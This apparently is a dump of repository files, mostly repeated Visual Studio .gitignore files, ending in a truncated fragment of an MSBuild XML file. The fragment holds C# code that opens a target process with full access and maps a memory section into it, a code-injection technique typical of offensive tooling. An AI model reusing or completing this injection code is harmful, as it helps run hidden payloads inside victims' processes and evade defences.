3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | *.bin 7 | *.pem 8 | 9 | # User-specific files 10 | *.rsuser 11 | *.suo 12 | *.user 13 | *.userosscache 14 | *.sln.docstates 15 | 16 | # User-specific files (MonoDevelop/Xamarin Studio) 17 | *.userprefs 18 | 19 | # Mono auto generated files 20 | mono_crash.* 21 | 22 | # Build results 23 | [Dd]ebug/ 24 | [Dd]ebugPublic/ 25 | [Rr]elease/ 26 | [Rr]eleases/ 27 | x64/ 28 | x86/ 29 | [Ww][Ii][Nn]32/ 30 | [Aa][Rr][Mm]/ 31 | [Aa][Rr][Mm]64/ 32 | bld/ 33 | [Bb]in/ 34 | [Oo]bj/ 35 | [Ll]og/ 36 | [Ll]ogs/ 37 | 38 | # Visual Studio 2015/2017 cache/options directory 39 | .vs/ 40 | # Uncomment if you have tasks that create the project's static files in wwwroot 41 | #wwwroot/ 42 | 43 | # Visual Studio 2017 auto generated files 44 | Generated\ Files/ 45 | 46 | # MSTest test Results 47 | [Tt]est[Rr]esult*/ 48 | [Bb]uild[Ll]og.* 49 | 50 | # NUnit 51 | *.VisualState.xml 52 | TestResult.xml 53 | nunit-*.xml 54 | 55 | # Build Results of an ATL Project 56 | [Dd]ebugPS/ 57 | [Rr]eleasePS/ 58 | dlldata.c 59 | 60 | # Benchmark Results 61 | BenchmarkDotNet.Artifacts/ 62 | 63 | # .NET Core 64 | project.lock.json 65 | project.fragment.lock.json 66 | artifacts/ 67 | 68 | # ASP.NET Scaffolding 69 | ScaffoldingReadMe.txt 70 | 71 | # StyleCop 72 | StyleCopReport.xml 73 | 74 | # Files built by Visual Studio 75 | *_i.c 76 | *_p.c 77 | *_h.h 78 | *.ilk 79 | *.meta 80 | *.obj 81 | *.iobj 82 | *.pch 83 | *.pdb 84 | *.ipdb 85 | *.pgc 86 | *.pgd 87 | *.rsp 88 | *.sbr 89 | *.tlb 90 | *.tli 91 | *.tlh 92 | *.tmp 93 | *.tmp_proj 94 | *_wpftmp.csproj 95 | *.log 96 | *.tlog 97 | *.vspscc 98 | *.vssscc 99 | .builds 100 | *.pidb 101 | *.svclog 102 | *.scc 103 | 104 | # Chutzpah Test files 105 | _Chutzpah* 106 | 107 | # Visual C++ cache files 108 | ipch/ 109 | *.aps 110 | *.ncb 111 | *.opendb 112 | *.opensdf 113 | *.sdf 114 | *.cachefile 115 | *.VC.db 116 | *.VC.VC.opendb 117 | 118 | # Visual Studio 
profiler 119 | *.psess 120 | *.vsp 121 | *.vspx 122 | *.sap 123 | 124 | # Visual Studio Trace Files 125 | *.e2e 126 | 127 | # TFS 2012 Local Workspace 128 | $tf/ 129 | 130 | # Guidance Automation Toolkit 131 | *.gpState 132 | 133 | # ReSharper is a .NET coding add-in 134 | _ReSharper*/ 135 | *.[Rr]e[Ss]harper 136 | *.DotSettings.user 137 | 138 | # TeamCity is a build add-in 139 | _TeamCity* 140 | 141 | # DotCover is a Code Coverage Tool 142 | *.dotCover 143 | 144 | # AxoCover is a Code Coverage Tool 145 | .axoCover/* 146 | !.axoCover/settings.json 147 | 148 | # Coverlet is a free, cross platform Code Coverage Tool 149 | coverage*.json 150 | coverage*.xml 151 | coverage*.info 152 | 153 | # Visual Studio code coverage results 154 | *.coverage 155 | *.coveragexml 156 | 157 | # NCrunch 158 | _NCrunch_* 159 | .*crunch*.local.xml 160 | nCrunchTemp_* 161 | 162 | # MightyMoose 163 | *.mm.* 164 | AutoTest.Net/ 165 | 166 | # Web workbench (sass) 167 | .sass-cache/ 168 | 169 | # Installshield output folder 170 | [Ee]xpress/ 171 | 172 | # DocProject is a documentation generator add-in 173 | DocProject/buildhelp/ 174 | DocProject/Help/*.HxT 175 | DocProject/Help/*.HxC 176 | DocProject/Help/*.hhc 177 | DocProject/Help/*.hhk 178 | DocProject/Help/*.hhp 179 | DocProject/Help/Html2 180 | DocProject/Help/html 181 | 182 | # Click-Once directory 183 | publish/ 184 | 185 | # Publish Web Output 186 | *.[Pp]ublish.xml 187 | *.azurePubxml 188 | # Note: Comment the next line if you want to checkin your web deploy settings, 189 | # but database connection strings (with potential passwords) will be unencrypted 190 | *.pubxml 191 | *.publishproj 192 | 193 | # Microsoft Azure Web App publish settings. 
Comment the next line if you want to 194 | # checkin your Azure Web App publish settings, but sensitive information contained 195 | # in these scripts will be unencrypted 196 | PublishScripts/ 197 | 198 | # NuGet Packages 199 | *.nupkg 200 | # NuGet Symbol Packages 201 | *.snupkg 202 | # The packages folder can be ignored because of Package Restore 203 | **/[Pp]ackages/* 204 | # except build/, which is used as an MSBuild target. 205 | !**/[Pp]ackages/build/ 206 | # Uncomment if necessary however generally it will be regenerated when needed 207 | #!**/[Pp]ackages/repositories.config 208 | # NuGet v3's project.json files produces more ignorable files 209 | *.nuget.props 210 | *.nuget.targets 211 | 212 | # Nuget personal access tokens and Credentials 213 | nuget.config 214 | 215 | # Microsoft Azure Build Output 216 | csx/ 217 | *.build.csdef 218 | 219 | # Microsoft Azure Emulator 220 | ecf/ 221 | rcf/ 222 | 223 | # Windows Store app package directories and files 224 | AppPackages/ 225 | BundleArtifacts/ 226 | Package.StoreAssociation.xml 227 | _pkginfo.txt 228 | *.appx 229 | *.appxbundle 230 | *.appxupload 231 | 232 | # Visual Studio cache files 233 | # files ending in .cache can be ignored 234 | *.[Cc]ache 235 | # but keep track of directories ending in .cache 236 | !?*.[Cc]ache/ 237 | 238 | # Others 239 | ClientBin/ 240 | ~$* 241 | *~ 242 | *.dbmdl 243 | *.dbproj.schemaview 244 | *.jfm 245 | *.pfx 246 | *.publishsettings 247 | orleans.codegen.cs 248 | 249 | # Including strong name files can present a security risk 250 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 251 | #*.snk 252 | 253 | # Since there are multiple workflows, uncomment next line to ignore bower_components 254 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 255 | #bower_components/ 256 | 257 | # RIA/Silverlight projects 258 | Generated_Code/ 259 | 260 | # Backup & report files from converting an old project file 261 | # to a newer Visual Studio version. 
Backup files are not needed, 262 | # because we have git ;-) 263 | _UpgradeReport_Files/ 264 | Backup*/ 265 | UpgradeLog*.XML 266 | UpgradeLog*.htm 267 | ServiceFabricBackup/ 268 | *.rptproj.bak 269 | 270 | # SQL Server files 271 | *.mdf 272 | *.ldf 273 | *.ndf 274 | 275 | # Business Intelligence projects 276 | *.rdl.data 277 | *.bim.layout 278 | *.bim_*.settings 279 | *.rptproj.rsuser 280 | *- [Bb]ackup.rdl 281 | *- [Bb]ackup ([0-9]).rdl 282 | *- [Bb]ackup ([0-9][0-9]).rdl 283 | 284 | # Microsoft Fakes 285 | FakesAssemblies/ 286 | 287 | # GhostDoc plugin setting file 288 | *.GhostDoc.xml 289 | 290 | # Node.js Tools for Visual Studio 291 | .ntvs_analysis.dat 292 | node_modules/ 293 | 294 | # Visual Studio 6 build log 295 | *.plg 296 | 297 | # Visual Studio 6 workspace options file 298 | *.opt 299 | 300 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 301 | *.vbw 302 | 303 | # Visual Studio LightSwitch build output 304 | **/*.HTMLClient/GeneratedArtifacts 305 | **/*.DesktopClient/GeneratedArtifacts 306 | **/*.DesktopClient/ModelManifest.xml 307 | **/*.Server/GeneratedArtifacts 308 | **/*.Server/ModelManifest.xml 309 | _Pvt_Extensions 310 | 311 | # Paket dependency manager 312 | .paket/paket.exe 313 | paket-files/ 314 | 315 | # FAKE - F# Make 316 | .fake/ 317 | 318 | # CodeRush personal settings 319 | .cr/personal 320 | 321 | # Python Tools for Visual Studio (PTVS) 322 | __pycache__/ 323 | *.pyc 324 | 325 | # Cake - Uncomment if you are using it 326 | # tools/** 327 | # !tools/packages.config 328 | 329 | # Tabs Studio 330 | *.tss 331 | 332 | # Telerik's JustMock configuration file 333 | *.jmconfig 334 | 335 | # BizTalk build output 336 | *.btp.cs 337 | *.btm.cs 338 | *.odx.cs 339 | *.xsd.cs 340 | 341 | # OpenCover UI analysis results 342 | OpenCover/ 343 | 344 | # Azure Stream Analytics local run output 345 | ASALocalRun/ 346 | 347 | # MSBuild Binary and Structured Log 348 | *.binlog 349 | 350 | # NVidia Nsight GPU debugger 
configuration file 351 | *.nvuser 352 | 353 | # MFractors (Xamarin productivity tool) working folder 354 | .mfractor/ 355 | 356 | # Local History for Visual Studio 357 | .localhistory/ 358 | 359 | # BeatPulse healthcheck temp database 360 | healthchecksdb 361 | 362 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 363 | MigrationBackup/ 364 | 365 | # Ionide (cross platform F# VS Code tools) working folder 366 | .ionide/ 367 | 368 | # Fody - auto-generated XML schema 369 | FodyWeavers.xsd 370 | 371 | # VS Code files for those working on multiple tools 372 | .vscode/* 373 | !.vscode/settings.json 374 | !.vscode/tasks.json 375 | !.vscode/launch.json 376 | !.vscode/extensions.json 377 | *.code-workspace 378 | 379 | # Local History for Visual Studio Code 380 | .history/ 381 | 382 | # Windows Installer files from build outputs 383 | *.cab 384 | *.msi 385 | *.msix 386 | *.msm 387 | *.msp 388 | 389 | # JetBrains Rider 390 | .idea/ 391 | *.sln.iml -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 
3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | *.bin 7 | *.pem 8 | 9 | # User-specific files 10 | *.rsuser 11 | *.suo 12 | *.user 13 | *.userosscache 14 | *.sln.docstates 15 | 16 | # User-specific files (MonoDevelop/Xamarin Studio) 17 | *.userprefs 18 | 19 | # Mono auto generated files 20 | mono_crash.* 21 | 22 | # Build results 23 | [Dd]ebug/ 24 | [Dd]ebugPublic/ 25 | [Rr]elease/ 26 | [Rr]eleases/ 27 | x64/ 28 | x86/ 29 | [Ww][Ii][Nn]32/ 30 | [Aa][Rr][Mm]/ 31 | [Aa][Rr][Mm]64/ 32 | bld/ 33 | [Bb]in/ 34 | [Oo]bj/ 35 | [Ll]og/ 36 | [Ll]ogs/ 37 | 38 | # Visual Studio 2015/2017 cache/options directory 39 | .vs/ 40 | # Uncomment if you have tasks that create the project's static files in wwwroot 41 | #wwwroot/ 42 | 43 | # Visual Studio 2017 auto generated files 44 | Generated\ Files/ 45 | 46 | # MSTest test Results 47 | [Tt]est[Rr]esult*/ 48 | [Bb]uild[Ll]og.* 49 | 50 | # NUnit 51 | *.VisualState.xml 52 | TestResult.xml 53 | nunit-*.xml 54 | 55 | # Build Results of an ATL Project 56 | [Dd]ebugPS/ 57 | [Rr]eleasePS/ 58 | dlldata.c 59 | 60 | # Benchmark Results 61 | BenchmarkDotNet.Artifacts/ 62 | 63 | # .NET Core 64 | project.lock.json 65 | project.fragment.lock.json 66 | artifacts/ 67 | 68 | # ASP.NET Scaffolding 69 | ScaffoldingReadMe.txt 70 | 71 | # StyleCop 72 | StyleCopReport.xml 73 | 74 | # Files built by Visual Studio 75 | *_i.c 76 | *_p.c 77 | *_h.h 78 | *.ilk 79 | *.meta 80 | *.obj 81 | *.iobj 82 | *.pch 83 | *.pdb 84 | *.ipdb 85 | *.pgc 86 | *.pgd 87 | *.rsp 88 | *.sbr 89 | *.tlb 90 | *.tli 91 | *.tlh 92 | *.tmp 93 | *.tmp_proj 94 | *_wpftmp.csproj 95 | *.log 96 | *.tlog 97 | *.vspscc 98 | *.vssscc 99 | .builds 100 | *.pidb 101 | *.svclog 102 | *.scc 103 | 104 | # Chutzpah Test files 105 | _Chutzpah* 106 | 107 | # Visual C++ cache files 108 | ipch/ 109 | *.aps 110 | *.ncb 111 | *.opendb 112 | *.opensdf 113 | *.sdf 114 | *.cachefile 115 | *.VC.db 116 | *.VC.VC.opendb 117 | 118 | # Visual Studio 
profiler 119 | *.psess 120 | *.vsp 121 | *.vspx 122 | *.sap 123 | 124 | # Visual Studio Trace Files 125 | *.e2e 126 | 127 | # TFS 2012 Local Workspace 128 | $tf/ 129 | 130 | # Guidance Automation Toolkit 131 | *.gpState 132 | 133 | # ReSharper is a .NET coding add-in 134 | _ReSharper*/ 135 | *.[Rr]e[Ss]harper 136 | *.DotSettings.user 137 | 138 | # TeamCity is a build add-in 139 | _TeamCity* 140 | 141 | # DotCover is a Code Coverage Tool 142 | *.dotCover 143 | 144 | # AxoCover is a Code Coverage Tool 145 | .axoCover/* 146 | !.axoCover/settings.json 147 | 148 | # Coverlet is a free, cross platform Code Coverage Tool 149 | coverage*.json 150 | coverage*.xml 151 | coverage*.info 152 | 153 | # Visual Studio code coverage results 154 | *.coverage 155 | *.coveragexml 156 | 157 | # NCrunch 158 | _NCrunch_* 159 | .*crunch*.local.xml 160 | nCrunchTemp_* 161 | 162 | # MightyMoose 163 | *.mm.* 164 | AutoTest.Net/ 165 | 166 | # Web workbench (sass) 167 | .sass-cache/ 168 | 169 | # Installshield output folder 170 | [Ee]xpress/ 171 | 172 | # DocProject is a documentation generator add-in 173 | DocProject/buildhelp/ 174 | DocProject/Help/*.HxT 175 | DocProject/Help/*.HxC 176 | DocProject/Help/*.hhc 177 | DocProject/Help/*.hhk 178 | DocProject/Help/*.hhp 179 | DocProject/Help/Html2 180 | DocProject/Help/html 181 | 182 | # Click-Once directory 183 | publish/ 184 | 185 | # Publish Web Output 186 | *.[Pp]ublish.xml 187 | *.azurePubxml 188 | # Note: Comment the next line if you want to checkin your web deploy settings, 189 | # but database connection strings (with potential passwords) will be unencrypted 190 | *.pubxml 191 | *.publishproj 192 | 193 | # Microsoft Azure Web App publish settings. 
Comment the next line if you want to 194 | # checkin your Azure Web App publish settings, but sensitive information contained 195 | # in these scripts will be unencrypted 196 | PublishScripts/ 197 | 198 | # NuGet Packages 199 | *.nupkg 200 | # NuGet Symbol Packages 201 | *.snupkg 202 | # The packages folder can be ignored because of Package Restore 203 | **/[Pp]ackages/* 204 | # except build/, which is used as an MSBuild target. 205 | !**/[Pp]ackages/build/ 206 | # Uncomment if necessary however generally it will be regenerated when needed 207 | #!**/[Pp]ackages/repositories.config 208 | # NuGet v3's project.json files produces more ignorable files 209 | *.nuget.props 210 | *.nuget.targets 211 | 212 | # Nuget personal access tokens and Credentials 213 | nuget.config 214 | 215 | # Microsoft Azure Build Output 216 | csx/ 217 | *.build.csdef 218 | 219 | # Microsoft Azure Emulator 220 | ecf/ 221 | rcf/ 222 | 223 | # Windows Store app package directories and files 224 | AppPackages/ 225 | BundleArtifacts/ 226 | Package.StoreAssociation.xml 227 | _pkginfo.txt 228 | *.appx 229 | *.appxbundle 230 | *.appxupload 231 | 232 | # Visual Studio cache files 233 | # files ending in .cache can be ignored 234 | *.[Cc]ache 235 | # but keep track of directories ending in .cache 236 | !?*.[Cc]ache/ 237 | 238 | # Others 239 | ClientBin/ 240 | ~$* 241 | *~ 242 | *.dbmdl 243 | *.dbproj.schemaview 244 | *.jfm 245 | *.pfx 246 | *.publishsettings 247 | orleans.codegen.cs 248 | 249 | # Including strong name files can present a security risk 250 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 251 | #*.snk 252 | 253 | # Since there are multiple workflows, uncomment next line to ignore bower_components 254 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 255 | #bower_components/ 256 | 257 | # RIA/Silverlight projects 258 | Generated_Code/ 259 | 260 | # Backup & report files from converting an old project file 261 | # to a newer Visual Studio version. 
Backup files are not needed, 262 | # because we have git ;-) 263 | _UpgradeReport_Files/ 264 | Backup*/ 265 | UpgradeLog*.XML 266 | UpgradeLog*.htm 267 | ServiceFabricBackup/ 268 | *.rptproj.bak 269 | 270 | # SQL Server files 271 | *.mdf 272 | *.ldf 273 | *.ndf 274 | 275 | # Business Intelligence projects 276 | *.rdl.data 277 | *.bim.layout 278 | *.bim_*.settings 279 | *.rptproj.rsuser 280 | *- [Bb]ackup.rdl 281 | *- [Bb]ackup ([0-9]).rdl 282 | *- [Bb]ackup ([0-9][0-9]).rdl 283 | 284 | # Microsoft Fakes 285 | FakesAssemblies/ 286 | 287 | # GhostDoc plugin setting file 288 | *.GhostDoc.xml 289 | 290 | # Node.js Tools for Visual Studio 291 | .ntvs_analysis.dat 292 | node_modules/ 293 | 294 | # Visual Studio 6 build log 295 | *.plg 296 | 297 | # Visual Studio 6 workspace options file 298 | *.opt 299 | 300 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 301 | *.vbw 302 | 303 | # Visual Studio LightSwitch build output 304 | **/*.HTMLClient/GeneratedArtifacts 305 | **/*.DesktopClient/GeneratedArtifacts 306 | **/*.DesktopClient/ModelManifest.xml 307 | **/*.Server/GeneratedArtifacts 308 | **/*.Server/ModelManifest.xml 309 | _Pvt_Extensions 310 | 311 | # Paket dependency manager 312 | .paket/paket.exe 313 | paket-files/ 314 | 315 | # FAKE - F# Make 316 | .fake/ 317 | 318 | # CodeRush personal settings 319 | .cr/personal 320 | 321 | # Python Tools for Visual Studio (PTVS) 322 | __pycache__/ 323 | *.pyc 324 | 325 | # Cake - Uncomment if you are using it 326 | # tools/** 327 | # !tools/packages.config 328 | 329 | # Tabs Studio 330 | *.tss 331 | 332 | # Telerik's JustMock configuration file 333 | *.jmconfig 334 | 335 | # BizTalk build output 336 | *.btp.cs 337 | *.btm.cs 338 | *.odx.cs 339 | *.xsd.cs 340 | 341 | # OpenCover UI analysis results 342 | OpenCover/ 343 | 344 | # Azure Stream Analytics local run output 345 | ASALocalRun/ 346 | 347 | # MSBuild Binary and Structured Log 348 | *.binlog 349 | 350 | # NVidia Nsight GPU debugger 
configuration file 351 | *.nvuser 352 | 353 | # MFractors (Xamarin productivity tool) working folder 354 | .mfractor/ 355 | 356 | # Local History for Visual Studio 357 | .localhistory/ 358 | 359 | # BeatPulse healthcheck temp database 360 | healthchecksdb 361 | 362 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 363 | MigrationBackup/ 364 | 365 | # Ionide (cross platform F# VS Code tools) working folder 366 | .ionide/ 367 | 368 | # Fody - auto-generated XML schema 369 | FodyWeavers.xsd 370 | 371 | # VS Code files for those working on multiple tools 372 | .vscode/* 373 | !.vscode/settings.json 374 | !.vscode/tasks.json 375 | !.vscode/launch.json 376 | !.vscode/extensions.json 377 | *.code-workspace 378 | 379 | # Local History for Visual Studio Code 380 | .history/ 381 | 382 | # Windows Installer files from build outputs 383 | *.cab 384 | *.msi 385 | *.msix 386 | *.msm 387 | *.msp 388 | 389 | # JetBrains Rider 390 | .idea/ 391 | *.sln.iml 392 | 393 | -------------------------------------------------------------------------------- /Ballista/.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 
3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Ll]og/ 33 | [Ll]ogs/ 34 | 35 | # Visual Studio 2015/2017 cache/options directory 36 | .vs/ 37 | # Uncomment if you have tasks that create the project's static files in wwwroot 38 | #wwwroot/ 39 | 40 | # Visual Studio 2017 auto generated files 41 | Generated\ Files/ 42 | 43 | # MSTest test Results 44 | [Tt]est[Rr]esult*/ 45 | [Bb]uild[Ll]og.* 46 | 47 | # NUnit 48 | *.VisualState.xml 49 | TestResult.xml 50 | nunit-*.xml 51 | 52 | # Build Results of an ATL Project 53 | [Dd]ebugPS/ 54 | [Rr]eleasePS/ 55 | dlldata.c 56 | 57 | # Benchmark Results 58 | BenchmarkDotNet.Artifacts/ 59 | 60 | # .NET Core 61 | project.lock.json 62 | project.fragment.lock.json 63 | artifacts/ 64 | 65 | # ASP.NET Scaffolding 66 | ScaffoldingReadMe.txt 67 | 68 | # StyleCop 69 | StyleCopReport.xml 70 | 71 | # Files built by Visual Studio 72 | *_i.c 73 | *_p.c 74 | *_h.h 75 | *.ilk 76 | *.meta 77 | *.obj 78 | *.iobj 79 | *.pch 80 | *.pdb 81 | *.ipdb 82 | *.pgc 83 | *.pgd 84 | *.rsp 85 | *.sbr 86 | *.tlb 87 | *.tli 88 | *.tlh 89 | *.tmp 90 | *.tmp_proj 91 | *_wpftmp.csproj 92 | *.log 93 | *.tlog 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 
118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. 
Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Nuget personal access tokens and Credentials 210 | nuget.config 211 | 212 | # Microsoft Azure Build Output 213 | csx/ 214 | *.build.csdef 215 | 216 | # Microsoft Azure Emulator 217 | ecf/ 218 | rcf/ 219 | 220 | # Windows Store app package directories and files 221 | AppPackages/ 222 | BundleArtifacts/ 223 | Package.StoreAssociation.xml 224 | _pkginfo.txt 225 | *.appx 226 | *.appxbundle 227 | *.appxupload 228 | 229 | # Visual Studio cache files 230 | # files ending in .cache can be ignored 231 | *.[Cc]ache 232 | # but keep track of directories ending in .cache 233 | !?*.[Cc]ache/ 234 | 235 | # Others 236 | ClientBin/ 237 | ~$* 238 | *~ 239 | *.dbmdl 240 | *.dbproj.schemaview 241 | *.jfm 242 | *.pfx 243 | *.publishsettings 244 | orleans.codegen.cs 245 | 246 | # Including strong name files can present a security risk 247 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 248 | #*.snk 249 | 250 | # Since there are multiple workflows, uncomment next line to ignore bower_components 251 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 252 | #bower_components/ 253 | 254 | # RIA/Silverlight projects 255 | Generated_Code/ 256 | 257 | # Backup & report files from converting an old project file 258 | # to a newer Visual Studio version. 
Backup files are not needed, 259 | # because we have git ;-) 260 | _UpgradeReport_Files/ 261 | Backup*/ 262 | UpgradeLog*.XML 263 | UpgradeLog*.htm 264 | ServiceFabricBackup/ 265 | *.rptproj.bak 266 | 267 | # SQL Server files 268 | *.mdf 269 | *.ldf 270 | *.ndf 271 | 272 | # Business Intelligence projects 273 | *.rdl.data 274 | *.bim.layout 275 | *.bim_*.settings 276 | *.rptproj.rsuser 277 | *- [Bb]ackup.rdl 278 | *- [Bb]ackup ([0-9]).rdl 279 | *- [Bb]ackup ([0-9][0-9]).rdl 280 | 281 | # Microsoft Fakes 282 | FakesAssemblies/ 283 | 284 | # GhostDoc plugin setting file 285 | *.GhostDoc.xml 286 | 287 | # Node.js Tools for Visual Studio 288 | .ntvs_analysis.dat 289 | node_modules/ 290 | 291 | # Visual Studio 6 build log 292 | *.plg 293 | 294 | # Visual Studio 6 workspace options file 295 | *.opt 296 | 297 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 298 | *.vbw 299 | 300 | # Visual Studio LightSwitch build output 301 | **/*.HTMLClient/GeneratedArtifacts 302 | **/*.DesktopClient/GeneratedArtifacts 303 | **/*.DesktopClient/ModelManifest.xml 304 | **/*.Server/GeneratedArtifacts 305 | **/*.Server/ModelManifest.xml 306 | _Pvt_Extensions 307 | 308 | # Paket dependency manager 309 | .paket/paket.exe 310 | paket-files/ 311 | 312 | # FAKE - F# Make 313 | .fake/ 314 | 315 | # CodeRush personal settings 316 | .cr/personal 317 | 318 | # Python Tools for Visual Studio (PTVS) 319 | __pycache__/ 320 | *.pyc 321 | 322 | # Cake - Uncomment if you are using it 323 | # tools/** 324 | # !tools/packages.config 325 | 326 | # Tabs Studio 327 | *.tss 328 | 329 | # Telerik's JustMock configuration file 330 | *.jmconfig 331 | 332 | # BizTalk build output 333 | *.btp.cs 334 | *.btm.cs 335 | *.odx.cs 336 | *.xsd.cs 337 | 338 | # OpenCover UI analysis results 339 | OpenCover/ 340 | 341 | # Azure Stream Analytics local run output 342 | ASALocalRun/ 343 | 344 | # MSBuild Binary and Structured Log 345 | *.binlog 346 | 347 | # NVidia Nsight GPU debugger 
configuration file 348 | *.nvuser 349 | 350 | # MFractors (Xamarin productivity tool) working folder 351 | .mfractor/ 352 | 353 | # Local History for Visual Studio 354 | .localhistory/ 355 | 356 | # BeatPulse healthcheck temp database 357 | healthchecksdb 358 | 359 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 360 | MigrationBackup/ 361 | 362 | # Ionide (cross platform F# VS Code tools) working folder 363 | .ionide/ 364 | 365 | # Fody - auto-generated XML schema 366 | FodyWeavers.xsd 367 | 368 | # VS Code files for those working on multiple tools 369 | .vscode/* 370 | !.vscode/settings.json 371 | !.vscode/tasks.json 372 | !.vscode/launch.json 373 | !.vscode/extensions.json 374 | *.code-workspace 375 | 376 | # Local History for Visual Studio Code 377 | .history/ 378 | 379 | # Windows Installer files from build outputs 380 | *.cab 381 | *.msi 382 | *.msix 383 | *.msm 384 | *.msp 385 | 386 | # JetBrains Rider 387 | .idea/ 388 | *.sln.iml 389 | 390 | # VsCode 391 | .vscode/* 392 | !.vscode/settings.json 393 | !.vscode/tasks.json 394 | !.vscode/launch.json 395 | !.vscode/extensions.json 396 | *.code-workspace 397 | 398 | # Local History for Visual Studio Code 399 | .history/ -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectMsBuild/SharpSectionJect.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 9 | 10 | 11 | = 1) 94 | { 95 | foreach (System.Diagnostics.Process proc in processes) 96 | { 97 | if (proc.SessionId == currProcSessionId) 98 | { 99 | tPid = proc.Id; 100 | break; 101 | } 102 | } 103 | } 104 | } 105 | 106 | if (tPid >= 0) 107 | { 108 | IntPtr targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, tPid); 109 | 110 | if (targetHandle != IntPtr.Zero) 111 | { 112 | NtMapViewOfSection(sectionHandle, targetHandle, ref remoteSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, 
